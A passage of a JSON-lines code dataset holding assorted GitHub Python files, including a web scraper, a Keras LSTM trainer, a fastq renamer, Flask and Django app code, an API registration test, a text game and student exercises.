1 visible':'',\n 'Attribute 1 global':'',\n \n 'Attribute 2 name':'',\n 'Attribute 2 value(s)':'',\n 'Attribute 2 visible':'',\n 'Attribute 2 global':'',\n \n 'Attribute 3 name':'',\n 'Attribute 3 value(s)':'',\n 'Attribute 3 visible':'',\n 'Attribute 3 global':'',\n \n 'Attribute 4 name':'',\n 'Attribute 4 value(s)':'',\n 'Attribute 4 visible':'',\n 'Attribute 4 global':'',\n \n 'Attribute 5 name':'',\n 'Attribute 5 value(s)':'',\n 'Attribute 5 visible':'',\n 'Attribute 5 global':'',\n \n 'Attribute 6 name':'',\n 'Attribute 6 value(s)':'',\n 'Attribute 6 visible':'',\n 'Attribute 6 global':'',\n \n 'Attribute 7 name':'',\n 'Attribute 7 value(s)':'',\n 'Attribute 7 visible':'',\n 'Attribute 7 global':'',\n\n 'Attribute 8 name':'',\n 'Attribute 8 value(s)':'',\n 'Attribute 8 visible':'',\n 'Attribute 8 global':'',\n \n 'Attribute 9 name':'',\n 'Attribute 9 value(s)':'',\n 'Attribute 9 visible':'',\n 'Attribute 9 global':'',\n \n 'Attribute 10 name':'',\n 'Attribute 10 value(s)':'',\n 'Attribute 10 visible':'',\n 'Attribute 10 global':'',\n \n 'Attribute 11 name':'',\n 'Attribute 11 value(s)':'',\n 'Attribute 11 visible':'',\n 'Attribute 11 global':'',\n \n 'Attribute 12 name':'',\n 'Attribute 12 value(s)':'',\n 'Attribute 12 visible':'',\n 'Attribute 12 global':'',\n \n 'Attribute 13 name':'',\n 'Attribute 13 value(s)':'',\n 'Attribute 13 visible':'',\n 'Attribute 13 global':'',\n \n 'Attribute 14 name':'',\n 'Attribute 14 value(s)':'',\n 'Attribute 14 visible':'',\n 'Attribute 14 global':'',\n \n 'Attribute 15 name':'',\n 'Attribute 15 value(s)':'',\n 'Attribute 15 visible':'',\n 'Attribute 15 global':'',\n \n 'Attribute 16 name':'',\n 'Attribute 16 value(s)':'',\n 'Attribute 16 visible':'',\n 'Attribute 16 global':'',\n \n 'Attribute 17 name':'',\n 'Attribute 17 value(s)':'',\n 'Attribute 17 visible':'',\n 'Attribute 17 global':'',\n \n }\n \n \n \n # for cle,val in zip(attributeNames, attributeValues): \n for i in range(len(attributeNames)): \n nameCell = 'Attribute '+str(i+1)+' name'\n valueCell = 'Attribute '+str(i+1)+' value(s)'\n visibleCell ='Attribute '+str(i+1)+' visible'\n publicCell = 'Attribute '+str(i+1)+' global'\n\n value = attributeNames[i]\n value = str(value.full_text)\n value = ts.google(value, from_language = 'es', to_language='fr')\n\n cellValue = attributeValues[i]\n cellValue =str(cellValue.full_text)\n 
cellValue = ts.google(cellValue, from_language = 'es', to_language='fr')\n\n product[nameCell]= value\n product[valueCell]= cellValue\n product[visibleCell]= ''\n product[publicCell]= ''\n \n # # print(descLinked)\n\n # # print(fulldesc.replace(\"\\r\", \" \"))\n print(product.keys())\n return product\n \n \nresults = []\nlinks = get_links(url)\n\nfor link in links:\n results.append(get_productdata(link))\n time.sleep(1)\n\n\n# with open('emoto.csv', 'w', encoding='utf8', newline='') as f:\n# fc = csv.DictWriter(f, fieldnames=results[0].keys(),)\n# fc.writeheader()\n# fc.writerows(results)\n\nfor item in links:\n imagelink = get_product_images(item)\n for image in imagelink:\n r = s.get(image)\n name = image.split(\"/\")[3]\n with open(\"images/\"+name+\".jpg\", \"wb\") as fp:\n fp.write(r.content)\n \n\n","repo_name":"Alucard17th/woo-parser","sub_path":"wooparsee-motos.py","file_name":"wooparsee-motos.py","file_ext":"py","file_size_in_byte":10845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27374393642","text":"import logging\nimport os\nimport shutil\n\nimport pkg_resources\n\n\ndef copy_project_folder(directory):\n \"\"\"Creates folder structure in the target directory\n\n Parameters\n ----------\n directory:\n Location where the sample project should be copied to\n \"\"\"\n _recursive_overwrite(\"smif\", \"sample_project\", directory)\n if directory == \".\":\n dirname = \"the current directory\"\n else:\n dirname = directory\n logging.info(\"Created sample project in %s\", dirname)\n\n\ndef _recursive_overwrite(pkg, src, dest):\n if pkg_resources.resource_isdir(pkg, src):\n if not os.path.isdir(dest):\n os.makedirs(dest)\n contents = pkg_resources.resource_listdir(pkg, src)\n for item in contents:\n _recursive_overwrite(pkg, os.path.join(src, item), os.path.join(dest, item))\n else:\n filename = pkg_resources.resource_filename(pkg, src)\n shutil.copyfile(filename, dest)\n","repo_name":"nismod/smif","sub_path":"src/smif/controller/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"10345362098","text":"from django.urls import path\nfrom userprofile import views\n\n#TEMPLATE TAGGING\napp_name = 'userprofile'\n\nurlpatterns = [\n # path('submit/', views.submit, name='submit'),\n # path('newest/', views.newest, name='newest'),\n # path('s//vote/', views.vote, name='vote'),\n # path('s//', views.story, name='story'),\n path('/', views.userprofile, name='userprofile'),\n path('/votes/', views.votes, name='votes'),\n path('/submissions/', views.submissions, name='submissions'),\n\n]\n","repo_name":"shubhavee/Tech-News","sub_path":"technews/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34796821812","text":"# To make get similar random data splits etc:\n# https://keras.io/getting-started/faq/#how-can-i-record-the-training-validation-loss-accuracy-at-each-epoch\nRANDOM_SEED = 1\n\nimport numpy as np\nnp.random.seed(RANDOM_SEED)\nimport os\nos.environ['PYTHONHASHSEED'] = str(RANDOM_SEED)\nimport random as rn\nrn.seed(RANDOM_SEED)\n\nimport random\n\nfrom keras import backend as K\n\nimport tensorflow as tf\ntf.set_random_seed(RANDOM_SEED)\n\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, CSVLogger\nfrom keras.models import Sequential, 
load_model\nfrom keras.optimizers import Adam\nfrom keras.layers import LSTM, Dense, Dropout, Activation\nfrom keras.layers.core import Masking\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.normalization import BatchNormalization\n\nimport encoding\nimport data_generator\n\n\ndef build_model(\n input_length, char_count, depth, hidden_size, output_size, dropout=0.5\n):\n input_shape = (input_length, char_count)\n\n model = Sequential()\n\n model.add(Masking(input_shape=input_shape))\n\n for i in range(depth):\n layer_kwargs = {}\n layer_kwargs['return_sequences'] = i < (depth - 1)\n if input_shape and i == 0:\n layer_kwargs['input_shape'] = input_shape\n\n model.add(LSTM(\n hidden_size,\n **layer_kwargs\n ))\n model.add(BatchNormalization())\n model.add(Dropout(dropout))\n\n model.add(Dense(output_size))\n model.add(Activation('tanh'))\n\n model.compile(\n optimizer=Adam(clipnorm=5.),\n loss='mse',\n )\n\n return model\n\n\ndef train_from_generator(\n model,\n training_generator, training_steps_per_epoch,\n x_test, y_test,\n epochs, batch_size,\n **kwargs\n):\n history = None\n\n try:\n history = model.fit_generator(\n training_generator,\n steps_per_epoch=training_steps_per_epoch,\n max_queue_size=(2 * batch_size),\n epochs=epochs,\n verbose=2,\n validation_data=(x_test, y_test),\n callbacks=[\n EarlyStopping(\n patience=100,\n monitor='loss',\n ),\n ModelCheckpoint(\n 'model.h5',\n monitor='loss',\n save_best_only=True,\n ),\n CSVLogger('log.csv'),\n ],\n **kwargs\n )\n except KeyboardInterrupt:\n print(' Got Sigint')\n\n return history\n\n\ndef test_model(model, ranks, inverse_ranks, w2v_model, count, scaler=None):\n max_word_length = model.input_shape[1]\n x_test, y_test = data_generator.build_word2vec_data(\n w2v_model, ranks, max_word_length, scaler=scaler, count=count\n )\n\n n_test_data = len(x_test)\n count = min(count, n_test_data)\n indexes = random.sample(range(n_test_data), count)\n\n test_rows = x_test[indexes]\n predictions = model.predict(test_rows)\n targets = y_test[indexes]\n\n for i in range(count):\n print('{}: {} -> {:.8f}'.format(\n i,\n encoding.features_to_text(test_rows[i], inverse_ranks),\n np.linalg.norm(targets[i] - predictions[i]),\n ))\n\n\ndef main():\n max_word_length = 32\n batch_size = 64\n depth = 2\n hidden_size = 300\n\n training_steps_per_epoch = round(9000 / 64)\n epochs = 100\n\n w2v_model = data_generator.load_w2v_model('10k.npz')\n train_w2v_model, test_w2v_model = data_generator.split_w2v_model(w2v_model)\n\n ranks, inverse_ranks = encoding.load_ranks_from_file('ranks.pickle')\n\n scaler = data_generator.fit_scaler_on_w2v_data(train_w2v_model)\n\n generator = data_generator.word2vec_data_generator(\n train_w2v_model, ranks, max_word_length, batch_size, scaler=scaler\n )\n x_test, y_test = data_generator.build_word2vec_data(\n test_w2v_model, ranks, max_word_length, scaler=scaler\n )\n\n model = build_model(max_word_length, len(ranks), depth, hidden_size, 300)\n\n print()\n model.summary()\n print()\n\n print()\n test_model(model, ranks, inverse_ranks, test_w2v_model, 10, scaler=scaler)\n print()\n\n train_from_generator(\n model,\n generator, training_steps_per_epoch,\n x_test, y_test,\n epochs, batch_size,\n )\n\n print()\n test_model(model, ranks, inverse_ranks, test_w2v_model, 10, scaler=scaler)\n print()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"cpury/deep-embedding-pretraining","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70357440489","text":"#Task_9\n\n#Write a program that converts a variable name in snake_case format into CamelCase format. For simplicity we assume\n# that the variable name always consists of 3 words. For example: 'employee_first_name' -> 'EmployeeFirstName'\n\n\nsnake_style = 'employee_first_name'\nvar_str = snake_style.split('_')\nCamelCase = var_str[0].title() + var_str[1].title() + var_str[2].title()\nprint('CamelCase for %s is %s' %(snake_style, CamelCase))","repo_name":"exxmanster/introduction_python_hw","sub_path":"task_9.py","file_name":"task_9.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38793825627","text":"from __future__ import print_function\nfrom __future__ import division\nimport sys\nimport math\nimport os\nimport numpy\n\n# ***** readme *****\n# This script renames all fastq files to a numeric sequence and saves the mapping table\n# It can also perform the reverse operation\n\n\nfolder = sys.argv[1]\n\nmapfilepath = ''\n\nif len(sys.argv) > 2:\n    mapfilepath = sys.argv[2]\n\nmapdict = {}\nif mapfilepath == '':\n    if os.path.exists(folder + '/RenameList.txt'):\n        print('The input files may have already been renamed, since RenameList.txt is detected in ' + folder + '. To force rename files, please remove RenameList.txt')\n        exit(1)\n    count = 0\n    for filename in os.listdir(folder):\n        if filename.endswith('_1.fastq'):\n            count += 1\n            os.rename(folder + '/' + filename, folder + '/' + str(count) + '_1.fastq')\n            mapdict[count] = filename[:-8]\n            try:\n                os.rename(folder + '/' + filename[:-7] + '2.fastq', folder + '/' + str(count) + '_2.fastq')\n            except Exception as e:\n                sys.stderr.write(str(e) + ' Rename the pair: ' + filename[:-7] + '_2.fastq failed.\n')\n        if filename.endswith('_1.fastq.gz'):\n            count += 1\n            os.rename(folder + '/' + filename, folder + '/' + str(count) + '_1.fastq.gz')\n            mapdict[count] = filename[:-11]\n            try:\n                os.rename(folder + '/' + filename[:-10] + '2.fastq.gz', folder + '/' + str(count) + '_2.fastq.gz')\n            except Exception as e:\n                sys.stderr.write(str(e) + ' Rename the pair: ' + filename[:-10] + '_2.fastq.gz failed.\n')\n    outfile = open(folder + '/RenameList.txt', 'w')\n    for key in mapdict:\n        outfile.write(str(key) + '\t' + mapdict[key] + '\n')\n    outfile.close()\nelse:\n    if not os.path.exists(folder + '/RenameList.txt'):\n        print('RenameList.txt cannot be found in ' + folder + ', please check it')\n        exit(1)\n    mapfile = open(mapfilepath)\n    for line in mapfile.readlines():\n        info = line.rstrip().split('\t')\n        mapdict[int(info[0])] = info[1]\n    for key in mapdict:\n        if os.path.exists(folder + '/' + str(key) + '_1.fastq'):\n            os.rename(folder + '/' + str(key) + '_1.fastq', folder + '/' + str(mapdict[key]) + '_1.fastq')\n        if os.path.exists(folder + '/' + str(key) + '_2.fastq'):\n            os.rename(folder + '/' + str(key) + '_2.fastq', folder + '/' + str(mapdict[key]) + '_2.fastq')\n        if os.path.exists(folder + '/' + str(key) + '_1.fastq.gz'):\n            os.rename(folder + '/' + str(key) + '_1.fastq.gz', folder + '/' + str(mapdict[key]) + '_1.fastq.gz')\n        if os.path.exists(folder + '/' + str(key) + '_2.fastq.gz'):\n            os.rename(folder + '/' + str(key) + '_2.fastq.gz', folder + '/' + str(mapdict[key]) + 
'_2.fastq.gz')","repo_name":"ZijieJin/scFusion","sub_path":"bin/RenameFastqFiles.py","file_name":"RenameFastqFiles.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"34813093622","text":"# Name: Chandler Wilson\n# Date: 07/05/2018\n# COSC1336, Lab 6, 4 parts:\n# part 1: Write prime numbers to table\n# part 2: Census stat generator\n# part 3: Sum of file\n# part 4: Accept textual numbers for file sum\n\n\n# TODO This would make far more sense as a class (esp in terms of testability)\ndef how_many_primes():\n\n def prime_test(number):\n \"\"\"Tests a number to see if it is prime returns True if it is\"\"\"\n is_prime = True\n # Create an odd number list\n list_to_test = [2] + list(range(3, (number - 1), 2))\n\n # Concatenate 2 to check if even\n for i in list_to_test:\n if (number % i) == 0:\n is_prime = False\n break\n\n return is_prime\n\n def primes_to_nth_prime(n):\n \"\"\"Find the primes up to the nth prime and return them as a list.\"\"\"\n range_to_test = range(1, 1000000000, 2)\n prime_list = []\n\n # TODO I should really cache the results just brute forcing rn\n for odd_number in range_to_test:\n if len(prime_list) >= n:\n break\n if prime_test(odd_number):\n prime_list.append(odd_number)\n\n return prime_list\n\n def prime_table(number_of_primes):\n \"\"\"Generate a prime table\n\n Outputs to TT18_L6_Wilson_number_of_primesPrimes.txt.\n\n Args:\n number_of_primes (int): The number of primes to put into the table.\n \"\"\"\n\n def table_heading(number_of_primes, last_prime, outfile):\n number_of_primes = format(number_of_primes, ',')\n last_prime = format(last_prime, ',')\n # Centers within given number of characters\n # see https://pyformat.info/#string_pad_align\n first_line = format(\n 'The First ' + number_of_primes + ' Primes\\n', '^79')\n\n outfile.write(first_line)\n outfile.write('(the ' + number_of_primes +\n 'th is ' + last_prime + ')\\n')\n outfile.write('\\n')\n\n def table_footer(outfile):\n centered_end = format('End.', '^79')\n\n outfile.write('\\n')\n outfile.write(centered_end)\n\n primes_list = primes_to_nth_prime(number_of_primes)\n file_name = 'TT18_L6_Wilson_' + str(number_of_primes) + 'Primes.txt'\n outfile = open(file_name, 'w')\n counter = 1\n\n table_heading(number_of_primes, primes_list[-1], outfile)\n\n for prime in primes_list:\n if counter % 10 is 0 and counter is not 0:\n # This format forces seven digits of padding\n # see https://pyformat.info/#number\n outfile.write(format(prime, '7d') + '\\n')\n else:\n outfile.write(format(prime, '7d') + ', ')\n\n counter += 1\n\n table_footer(outfile)\n\n outfile.close()\n\n def collect_number():\n try:\n number = input('How many primes would you like in the table? 
' +\n '(enter for 1000): ')\n\n if not number:\n number = 1000\n else:\n number = int(number)\n\n # Check the range of the number\n if 1 < number < 1000000:\n pass\n else:\n raise ValueError\n except ValueError:\n print('ERROR: Please enter an integer between 1 and 1,000,000')\n print('-' * 30)\n return collect_number()\n else:\n return number\n\n number_of_primes = collect_number()\n prime_table(number_of_primes)\n\n\nclass Census():\n\n def __init__(self, infile_name):\n self.infile_name = infile_name\n self.state_info = {}\n\n self.encode_file()\n self.population_stats()\n\n def encode_file(self):\n infile = open(self.infile_name)\n\n with open(self.infile_name) as infile:\n while True:\n state = infile.readline().strip('\\n')\n\n if state:\n abbreviation = infile.readline().strip('\\n')\n population = infile.readline().strip('\\n')\n\n self.state_info[state] = {\n 'abbreviation': abbreviation,\n 'population': int(population)\n }\n else:\n break\n\n return self.state_info\n\n def population_stats(self):\n # This sorts by population retrieving the population with the lambda\n sorted_states_list = sorted(\n self.state_info,\n key=lambda state: self.state_info[state]['population'])\n total_population = 0\n\n for state in self.state_info:\n total_population += self.state_info[state]['population']\n\n highest_population = sorted_states_list[-1]\n lowest_population = sorted_states_list[1]\n average_population = format(\n (total_population / len(self.state_info)), ',.0f')\n texas_population = format(\n self.state_info['Texas']['population'], ',.0f')\n\n print(highest_population, 'has the highest population')\n print(lowest_population, 'has the lowest population')\n print(\"The average state's population is\", average_population)\n print('The state of Texas has a population of', texas_population)\n\n\nclass Numbers_file():\n\n def __init__(self, file_name):\n self.file_total = 0.0\n self.file_name = file_name\n\n print('Processing file:', file_name)\n\n if self.process_file():\n print('The values in the file', self.file_name,\n 'add up to:', format(self.file_total, ',.2f'))\n\n def process_file(self):\n try:\n infile = open(self.file_name)\n except:\n print('A read error occured on file:', self.file_name)\n\n return False\n else:\n for line_number, line in enumerate(infile):\n try:\n amount = float(line)\n except:\n print('Non-numeric data found in file:',\n self.file_name, 'at line:', line_number + 1,\n 'with input:', line)\n\n return False\n else:\n self.file_total += amount\n\n infile.close()\n\n return True\n\n @classmethod\n def from_input(cls):\n \"\"\"Prompts the user for the info needed to create class instances\"\"\"\n class_instances = []\n\n while True:\n file_name = input(\n 'Enter file name without .txt extension. (enter nothing ' +\n 'to quit): ')\n\n if file_name:\n file_name += '.txt'\n class_instances.append(cls(file_name))\n else:\n break\n\n return class_instances\n\n\ndef choice_list():\n print('Hello. This is COSC1336 lab 6 on files.')\n while True:\n option = input(\n 'Enter choice: 1)Prime Table 2)Census Stats 3)Total of ' +\n 'files 4,q)uit? 
')\n if option is '1':\n how_many_primes()\n elif option is '2':\n # Creates a throw away instance of the Census class\n Census('StateCensus2010.txt')\n elif option is '3':\n number_files = Numbers_file.from_input()\n elif option in ['4', 'q', 'Q', 'quit']:\n break\n else:\n print(' Invalid option, please try again.')\n print('\\nGoodbye')\n\n\nif __name__ == \"__main__\":\n choice_list()\n\n# Test output below\n# (env) chandler@chandler-G551JM:~/ACC/programming_fundamentals_1/labs/files_L6$ python TT18_L6_Wilson.py\n# Hello. This is COSC1336 lab 6 on files.\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 2\n# California has the highest population\n# Vermont has the lowest population\n# The average state's population is 6,181,560\n# The state of Texas has a population of 25,268,418\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 3\n# Enter file name without .txt extension. (enter nothing to quit): data1\n# Processing file: data1.txt\n# The values in the file data1.txt add up to: 6,600.66\n# Enter file name without .txt extension. (enter nothing to quit): data2\n# Processing file: data2.txt\n# Non-numeric data found in file: data2.txt at line: 3 with input: three hundred\n\n# Enter file name without .txt extension. (enter nothing to quit): data3\n# Processing file: data3.txt\n# A read error occured on file: data3.txt\n# Enter file name without .txt extension. (enter nothing to quit):\n# Enter choice: 1)Prime Table 2)Census Stats 3)Total of files 4,q)uit? 4\n\n# Goodbye\n","repo_name":"Chandler9Wilson/programming_fundamentals_1","sub_path":"labs/files_L6/TT18_L6_Wilson.py","file_name":"TT18_L6_Wilson.py","file_ext":"py","file_size_in_byte":8637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26658985388","text":"name=input('Qual o seu nome: ')\nprint ('Seja Bem vindo',name)\n\nday=input('Que dia você nasceu: ')\nmonth= input('Que mÊs você nasceu: ')\nyear= input('Em que ano você nasceu: ')\nprint('Você nasceu no dia', day,'/',month,'/',year)\n\nnumber1 =float(input('Digite um numero: '))\nnumber2 =float(input('Digite mais um numero: '))\nprint(number1 + number2)\n","repo_name":"Lucas-Melo-A-S/Curso_em_Video-Python","sub_path":"Pacote Resoluções/Python 2021/Desafio 01 e 02.py","file_name":"Desafio 01 e 02.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26367004682","text":"from typing import Dict, Optional\n\nfrom flask import Flask, render_template, url_for\nfrom flask_admin import Admin\nfrom flask_admin.menu import MenuLink\nfrom flask_login import LoginManager\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin_manager = LoginManager()\nadmin = Admin(name='Адвокат', template_mode='bootstrap4')\n\n\ndef create_app(config, test_config: Optional[Dict] = None):\n app = Flask(\n __name__,\n static_url_path='',\n static_folder='frontend/static',\n template_folder='frontend/templates',\n )\n app.config.from_object(config)\n if test_config is not None:\n app.config.update(test_config)\n\n register_extensions(app)\n register_commands(app)\n register_blueprints(app)\n register_handlers(app)\n register_routers(app)\n register_shell_context(app)\n\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n\n login_manager.login_view = 'auth.login_get_view'\n login_manager.login_message = 'Пожалуйста, 
войдите, чтобы получить доступ к странице'\n login_manager.session_protection = 'strong'\n login_manager.init_app(app)\n\n migrate.init_app(app, db)\n from .admin_panel import initialize_admin\n initialize_admin(app, db)\n from .admin_panel.user import UserModelView\n from .admin_panel.login import LoginLink\n from .models import User\n\ndef register_commands(app):\n pass\n\n\ndef register_blueprints(app):\n from .auth import auth_bp\n app.register_blueprint(auth_bp)\n\n\ndef register_handlers(app):\n pass\n\n\ndef register_routers(app):\n @app.get('/')\n def index_view():\n \"\"\"Главная страница\"\"\"\n return render_template(\n 'app/public/index.html',\n title='Главная',\n )\n\n\ndef register_shell_context(app):\n \"\"\"Регистрация моделей для использования в Flask shell\"\"\"\n from .models import User\n\n def shell_context():\n return {\n 'db': db,\n 'User': User,\n }\n\n app.shell_context_processor(shell_context)\n","repo_name":"andy-takker/personal_blog","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36076471014","text":"# St. apl: 171REB171\ng = 9.81\nv0 = (1+1)*10\nf = open('P08s3.dat','w')\nfor t in range(1+10):\n y = v0*t-(g*t**2)/2\n string = str(t)+' '+str(y)\n print(string)\n f.write(string+'\\n')\n\nfrom numpy import linspace, array\nt = linspace(0,1+10,12)\ny = v0*t-(g*t**2)/2\n\nfrom matplotlib import pyplot as p\np.plot(t,y,color=\"#ff00ff\",label=\"bumbas pozicija\")\np.legend()\np.show()\n","repo_name":"x171REB171/P08","sub_path":"P08s3.py","file_name":"P08s3.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31867758779","text":"import os\nimport unittest\n\nimport requests\nimport csv\n\n\nclass test_register(unittest.TestCase):\n def setUp(self) -> None:\n path = os.getcwd()\n self.p2 = os.path.abspath(os.path.dirname(path) + os.path.sep + \"..\")\n path1 = self.p2 + \"\\\\testdatefile\\ind_interfile\\\\register.csv\"\n self.file = open(path1, 'r')\n path2 = self.p2 + \"\\\\testdatefile\\ind_interfile\\\\register_restule.csv\"\n self.file2 = open(path2, 'w')\n self.url = \"http://129.211.129.101:9006/user/register.do\"\n\n def test_case(self):\n table = csv.reader(self.file)\n userinfo = {}\n for ray in table:\n userinfo[\"username\"] = ray[0]\n userinfo[\"password\"] = ray[1]\n userinfo[\"email\"] = ray[2]\n userinfo[\"phone\"] = ray[3]\n userinfo[\"question\"] = ray[4]\n userinfo[\"answer\"] = ray[5]\n\n respones = requests.post(self.url, data=userinfo).text\n print(respones)\n print(userinfo)\n msg = respones.find(ray[6])\n if msg > 0:\n print(\"接口测试通过\")\n self.file2.write(ray[0] + \",\" + ray[1] + \",\" + ray[2] + \",\" + ray[3] + ','\n + ray[4] + ',' + ray[5] + ',' + ray[6] + ',' + \"测试通过\" + \"\\n\")\n else:\n print(\"接口测试不通过\")\n self.file2.write(ray[0] + \",\" + ray[1] + \",\" + ray[2] + \",\" + ray[3] + ','\n + ray[4] + ',' + ray[5] + ',' + ray[6] + ',' + \"测试不通过\" + \"\\n\")\n self.file2.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Albertay1/interfcaeframwork","sub_path":"script/ind_interface/registertest.py","file_name":"registertest.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71844370089","text":"#!/usr/bin/env python3\n\nfrom os import getenv, sep\nfrom 
sys import stderr, version_info\n\ntry:\n from dearpygui import dearpygui\nexcept ImportError:\n base = sep.join(getenv(\"__PYVENV_LAUNCHER__\", \"\").split(sep)[:-1]) + sep\n stderr.write(\"\\ndearpygui module missing. Please install using\\n\")\n stderr.write(f\"sudo -H {base}pip{version_info.major}.{version_info.minor}\")\n stderr.write(\" install dearpygui\\n\\n\")\n exit()\nfrom random import randint\n\nfrom paravia_player import Player\n\n\nclass SantaParavia: # pylint: disable=too-many-ancestors\n def __init__(self):\n self.players = []\n self.Peppone = Player(\"Peppone\", 6)\n self.name = \"Santa Paravia And Fiumaccio\"\n\n @staticmethod\n def Instructions():\n msg = [\" You are the ruler of a 15th century Italian city-state.\"]\n msg.append(\"If you rule well, you will receive higher titles. The\")\n msg.append(\n \"first player to become a king or queen wins. Life expectancy\"\n )\n msg.append(\"then was brief, so you may not live long enough to win.\")\n msg.append(\" The computer will draw a map of your state. The size\")\n msg.append(\"of the area in the wall grows as you buy more land. The\")\n msg.append(\"size of the guard tower in the upper left corner shows\")\n msg.append(\"the adequacy of your defenses. If it shrinks, equip more\")\n msg.append(\n \"soldiers! If the horse and plowman is touching the top wall,\"\n )\n msg.append(\"all your land is in production. Otherwise you need more\")\n msg.append(\"serfs, who will migrate to your state if you distribute\")\n msg.append(\n \"more grain than the minimum demand. If you distribute less\"\n )\n msg.append(\"grain, some of your people will starve, and you will have\")\n msg.append(\"a high death rate. High taxes raise money, but slow down\")\n msg.append(\"economic growth.\")\n return \" \".join(msg)\n\n def Comparison(self, msg=\"\"):\n for player in self.players:\n # Display comparison table\n # Player title/name, nobles, soldiers, clergy, merchants, serfs, land, treasury\n pass\n\n @staticmethod\n def Obituary(player):\n player.IsDead = True\n msg = \"Very sad news.\\n\\n%s %s of %s has just died \" % (\n player.Title,\n player.Name,\n player.City,\n )\n if player.Year > 1450:\n msg += \"of old age after a long reign.\"\n return msg\n reason = randint(0, 8)\n if reason < 4:\n msg += \"of pneumonia after a cold winter in a drafty castle.\"\n elif reason == 5:\n msg += \"in a smallpox epidemic.\"\n elif reason == 4:\n msg += \"of typhoid after drinking contaminated water.\"\n elif reason == 6:\n msg += \"after being attacked by robbers while traveling.\"\n else:\n msg += \"of food poisoning.\"\n return msg\n\n @staticmethod\n def Born(player):\n serfs = int((randint(0, player.Marketplaces) * player.Serfs) / 100)\n player.Serfs += serfs\n return serfs\n\n @staticmethod\n def Die(player):\n serfs = int((randint(0, player.Marketplaces) * player.Serfs) / 100)\n player.Serfs -= serfs\n return serfs\n\n def Invasion(self, player):\n for other in self.players:\n if other.WhichPlayer == player.WhichPlayer:\n # Attacking ourselves would be silly.\n continue\n if other.Soldiers < player.Soldiers:\n # Don't attack someone stronger\n continue\n if other.Soldiers < int(1.2 * (float(player.Land) / 1000.0)):\n # Don't attack if we can't take land.\n continue\n if other.Soldiers > player.Soldiers:\n return other.AttackNeighbor(player)\n # Nobody was strong enough to attack. Use Peppone\n return self.Peppone.AttackNeighbor(player)\n\n def ControlLoop(self):\n for player in self.players:\n player.Year += 1\n player.GenerateHaravest()\n player.NewLandAndGrainPrices()\n player.GenerateIncome()\n # Buy and Sell grain and land\n howMuch: int = 1999\n player.ReleaseGrain(howMuch)\n if player.InvadeMe:\n self.Invasion(player)\n # Adjust taxes and justice\n player.AddRevenue()\n if player.IsBankrupt:\n player.SeizeAssets()\n # Display map\n # Buy mills, markets, etc.\n if player.Year >= player.YearOfDeath:\n self.Comparison(self.Obituary(player))\n self.players.remove(player)\n continue\n player.CheckNewTitle()\n if player.TitleNum >= 7:\n self.Comparison()\n # Yay, I won!\n break\n\n\nif __name__ == \"__main__\":\n version = dearpygui.get_dearpygui_version().split(\".\")\n if \"b\" in version[-1]:\n point = version[-1].split(\"b\")[0]\n beta = version[-1].split(\"b\")[1]\n version[-1] = point\n version.append(beta)\n version = [int(i) for i in version]\n print(f\"Running dearpygui version {dearpygui.get_dearpygui_version()}\")\n vlen = len(version) - 1\n tot = 0\n for i in version:\n tot += i * (10**vlen)\n vlen -= 1\n if tot < 112:\n stderr.write(\"\\ndearpygui version too old.\\n\")\n exit()\n","repo_name":"DNSGeek/Santa-Paravia","sub_path":"santa_paravia.py","file_name":"santa_paravia.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39963437623","text":"#!/usr/bin/python3\n\"\"\"\ncategory.py\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request\nfrom models import storage\nfrom models.category import Category\n\n\n@app_views.route('/categories', methods=['GET'], strict_slashes=False)\ndef get_categories():\n \"\"\"get category information for all categories\"\"\"\n catlist = []\n for category in storage.all(\"Category\").values():\n catlist.append(category.to_dict())\n return jsonify(catlist)\n\n\n@app_views.route('/categories/<category_id>', methods=['GET'],\n strict_slashes=False)\ndef get_category(category_id):\n \"\"\"get category information for specified category\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n return jsonify(category.to_dict())\n\n\n@app_views.route('/categories/<category_id>', methods=['DELETE'],\n strict_slashes=False)\ndef delete_category(category_id):\n \"\"\"deletes a category based on its category_id\"\"\"\n category = storage.get(\"Category\", category_id)\n if category is None:\n abort(404)\n category.delete()\n storage.save()\n return (jsonify({}))\n\n\n@app_views.route('/categories', methods=['POST'], 